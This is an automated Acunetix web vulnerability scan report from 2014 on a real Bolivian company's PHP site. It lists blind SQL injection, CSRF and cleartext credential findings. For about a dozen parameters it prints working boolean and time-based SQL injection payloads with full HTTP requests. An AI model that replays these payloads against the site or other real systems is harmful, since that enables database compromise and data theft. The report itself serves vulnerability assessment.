Acunetix Website Audit 16 May, 2014
Developer Report
Generated by Acunetix WVS Reporter (v9.0 Build 20130904)
Scan of http://www.cerroazul.com.bo:80/
Scan information
Scan details
Start time: 16/05/2014 08:49:53 a.m.
Finish time: 16/05/2014 09:26:18 a.m.
Scan time: 36 minutes, 24 seconds
Profile: Sql_Injection
Server information
Responsive: True
Server banner: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_fastcgi/mod_fastcgi-SNAP-0910052141
Server OS: Unix
Server technologies: PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Total alerts found: 37
High: 11
Medium: 13
Low: 0
Informational: 13
Knowledge base
List of client scripts
These files contain Javascript code referenced from the website.
- /common/js/accordionmenu.js
- /common/js/jquery.min.js
- /common/js/cargar_index.js
- /common/js/banner/jquery.nivo.slider.pack.js
- /common/js/banner/jquery.nivo.slider.js
- /common/js/gallery_bottom/jquery.js
- /common/js/gallery_bottom/jquery.easing.1.3.js
- /common/js/gallery_bottom/jquery.cssAnimate.mini.js
- /common/js/gallery_bottom/jquery.touchwipe.min.js
- /common/js/gallery_bottom/jquery.mousewheel.min.js
- /common/js/gallery_bottom/jquery.themepunch.services.min.js
- /common/js/mapa.js
- /common/js/gmaps.js
- /common/js/login.js
- /common/js/jquery.md5.js
- /common/js/cargar_contacto.js
- /common/js/comentario.js
- /common/js/cargar_cata.js
- /common/js/parametros.js
- /common/js/registrarse.js
- /common/js/jquery.history.js
- /common/js/jquery.galleriffic.js
- /common/js/jquery.opacityrollover.js
- /common/js/cargar_descripcion.js
- /common/js/actualizar_visita_cata.js
- /common/js/cargar_grupo.js
- /common/js/buscar.js
- /common/js/ubicaciones.js
- /common/js/search.js
- /common/jquery/jquery-1.4.2.js
- /common/jquery/ui/jquery.ui.core.js
- /common/jquery/ui/jquery.ui.widget.js
- /common/jquery/ui/jquery.ui.position.js
- /common/jquery/ui/jquery.ui.autocomplete.js
- /common/jquery/jquery-1.7.js
- /common/jquery/jquery-1.7.min.js
List of files with inputs
These files have at least one input (GET or POST).
- /common.php - 2 inputs
- /mapa.php - 1 inputs
- /sesion.php - 3 inputs
- /about.php - 1 inputs
- /index.php - 1 inputs
- /contacto.php - 2 inputs
- /comentario.php - 2 inputs
- /common/php/empresa/get_empresas.php - 1 inputs
- /common/php/search/get-datos.php - 1 inputs
- /common/php/search/get_datespag2.php - 1 inputs
- /common/php/catalogo/get_datos_descripcion.php - 1 inputs
- /common/php/catalogo/actualizar_cata.php - 1 inputs
- /common/php/contacto/get-datos.php - 1 inputs
- /common/php/contacto/enviar_datos.php - 1 inputs
- /common/php/comentario/get_datos.php - 1 inputs
- /common/php/comentario/get-datespag.php - 1 inputs
- /common/php/comentario/insertar_come.php - 1 inputs
- /catalogo.php - 1 inputs
- /suscribirse.php - 2 inputs
- /descripcion.php - 1 inputs
- /catalogo_grupo.php - 1 inputs
- /empresa.php - 1 inputs
- /privacidad.php - 1 inputs
- /listado.php - 1 inputs
List of external hosts
These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts allowed. (Settings->Scanners settings->Scanner->List of hosts allowed).
- maps.google.com
Alerts summary
Blind SQL Injection
Affects (Variations)
- /about.php (1)
- /catalogo.php (1)
- /catalogo_grupo.php (2)
- /comentario.php (1)
- /common.php (1)
- /common/php/catalogo/get_datos_descripcion.php (2)
- /common/php/comentario/get_datos.php (1)
- /common/php/search/get-datos.php (1)
- /contacto.php (1)
HTML form without CSRF protection
Affects (Variations)
- /comentario.php (1)
- /common.php (1)
- /contacto.php (1)
- /listado.php (1)
- /sesion.php (3)
- /suscribirse.php (2)
User credentials are sent in clear text
Affects (Variations)
- /listado.php (1)
- /sesion.php (1)
- /suscribirse.php (2)
Broken links
Affects (Variations)
- /common/css/ie-css3.htc (1)
- /common/css/menuUni.css (1)
- /common/css/minilistas_fcl.css (1)
- /common/css/minilistasfcl.css (1)
- /common/css/spritefcl.css (1)
- /common/css/spritefcl_class.css (1)
- /listado_empresas.php (1)
- /www.facebook.com/BarracaCerroAzul (1)
Password type input with auto-complete enabled
Affects (Variations)
- /empresa.php (1)
- /listado.php (1)
- /privacidad.php (1)
- /sesion.php (1)
- /suscribirse.php (1)
Alert details
Blind SQL Injection
Severity: High
Type: Validation
Reported by module: Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.
References
- OWASP Injection Flaws
- Acunetix SQL Injection Attack
- How to check for SQL injection vulnerabilities
- SQL Injection Walkthrough
- OWASP PHP Top 5
- VIDEO: SQL Injection tutorial
Affected items
/about.php
Details
URL encoded GET input id was set to 2/**/AND/**/810=810
Tests performed:
- 0+0+0+2 => TRUE
- 0+810*805+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 810=810 => TRUE
- 2 AND 3+1-1-1=1 AND 810=810 => FALSE
[ ... (line truncated)
Request headers
GET /about.php?id=2/**/AND/**/810%3d810 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo.php
Details
URL encoded GET input id was set to 2/**/AND/**/943=943
Tests performed:
- 0+0+0+2 => TRUE
- 0+943*938+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 943=943 => TRUE
- 2 AND 3+1-1-1=1 AND 943=943 => FALSE
[ ... (line truncated)
Request headers
GET /catalogo.php?id=2/**/AND/**/943%3d943 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo_grupo.php
Details
URL encoded GET input id_fami was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.63 s
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ ...(line truncated)
Request headers
GET /catalogo_grupo.php?id=1&id_fami=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&id_grupo=13 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo_grupo.php
Details
URL encoded GET input id_grupo was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 9.532 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...(line truncated)
Request headers
GET /catalogo_grupo.php?id=1&id_fami=3&id_grupo=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/comentario.php
Details
URL encoded GET input id was set to 2/**/AND/**/505=505
Tests performed:
- 0+0+0+2 => TRUE
- 0+505*500+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 505=505 => TRUE
- 2 AND 3+1-1-1=1 AND 505=505 => FALSE
[ ... (line truncated)
Request headers
GET /comentario.php?id=2/**/AND/**/505%3d505 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common.php
Details
URL encoded GET input id was set to 2/**/AND/**/757=757
Tests performed:
- 0+0+0+2 => TRUE
- 0+757*752+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 757=757 => TRUE
- 2 AND 3+1-1-1=1 AND 757=757 => FALSE
[ ... (line truncated)
Request headers
GET /common.php?id=2/**/AND/**/757%3d757 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_cata was set to 9/**/AND/**/407=407
Tests performed:
- 0+0+0+9 => TRUE
- 0+407*402+9 => FALSE
- 19-5-2-999 => FALSE
- 19-5-2-3 => TRUE
- 19-2*5+0+0+1-1 => TRUE
- 19-2*6+0+0+1-1 => FALSE
- 9 AND 2+1-1-1=1 AND 407=407 => TRUE
- 9 AND 3+1-1-1=1 AND 407=407 => FALSE
[/b ... (line truncated)
Request headers
GET /common/php/catalogo/get_datos_descripcion.php?id_cata=9/**/AND/**/407%3d407&id_empre=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_empre was set to 1/**/AND/**/938=938
Tests performed:
- 0+0+0+1 => TRUE
- 0+938*933+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 938=938 => TRUE
- 1 AND 3+1-1-1=1 AND 938=938 => FALSE
[/ ... (line truncated)
Request headers
GET /common/php/catalogo/get_datos_descripcion.php?id_cata=9&id_empre=1/**/AND/**/938%3d938 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/comentario/get_datos.php
Details
URL encoded GET input id_empre was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 3.105 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...(line truncated)
Request headers
GET /common/php/comentario/get_datos.php?id_empre=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/search/get-datos.php
Details
URL encoded GET input id_dpto was set to 1/**/AND/**/32=32
Tests performed:
- 0+0+0+1 => TRUE
- 0+32*27+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 32=32 => TRUE
- 1 AND 3+1-1-1=1 AND 32=32 => FALSE
[/li ... (line truncated)
Request headers
GET /common/php/search/get-datos.php?id_dpto=1/**/AND/**/32%3d32&parametro= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
URL encoded GET input id was set to 2/**/AND/**/918=918
Tests performed:
- 0+0+0+2 => TRUE
- 0+918*913+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 918=918 => TRUE
- 2 AND 3+1-1-1=1 AND 918=918 => FALSE
[ ... (line truncated)
Request headers
GET /contacto.php?id=2/**/AND/**/918%3d918 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
HTML form without CSRF protection
Severity: Medium
Type: Informational
Reported by module: Crawler
Description
This alert may be a false positive, manual confirmation is required.
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more information about the affected HTML form.
Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
/comentario.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/comentario.php
Form method: GET
Form inputs:
- name [Text]
- comentario [TextArea]
Request headers
GET /comentario.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/common.php
Form method: GET
Form inputs:
- name [Text]
- phone [Text]
- mensaje [TextArea]
Request headers
GET /common.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/contacto.php
Form method: GET
Form inputs:
- name [Text]
- correo [Text]
- phone [Text]
- mensaje [TextArea]
Request headers
GET /contacto.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST
Form inputs:
- txt_nombre [Text]
- password [Password]
Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST
Form inputs:
- usuario [Text]
- phone [Text]
- phone [Text]
- password [Text]
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST
Form inputs:
- phone [Text]
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST
Form inputs:
- phone [Text]
- password [Password]
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST
Form inputs:
- txt_usuario [Text]
- password [Password]
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST
Form inputs:
- txt_nombre [Text]
- name [Text]
- phone [Text]
- password [Password]
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
User credentials are sent in clear text
Severity: Medium
Type: Informational
Reported by module: Crawler
Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.
Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials are considered sensitive information, they should always be transferred to the server over an encrypted connection (HTTPS).
Affected items
/listado.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST
Form inputs:
- txt_nombre [Text]
- password [Password]
Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST
Form inputs:
- phone [Text]
- password [Password]
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST
Form inputs:
- txt_usuario [Text]
- password [Password]
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name:
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST
Form inputs:
- txt_nombre [Text]
- name [Text]
- phone [Text]
- password [Password]
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Broken links
Severity: Informational
Type: Informational
Reported by module: Crawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/common/css/ie-css3.htc
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/ie-css3.htc HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common/css/menu_acor.css
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/menuUni.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/menuUni.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/minilistas_fcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/minilistas_fcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
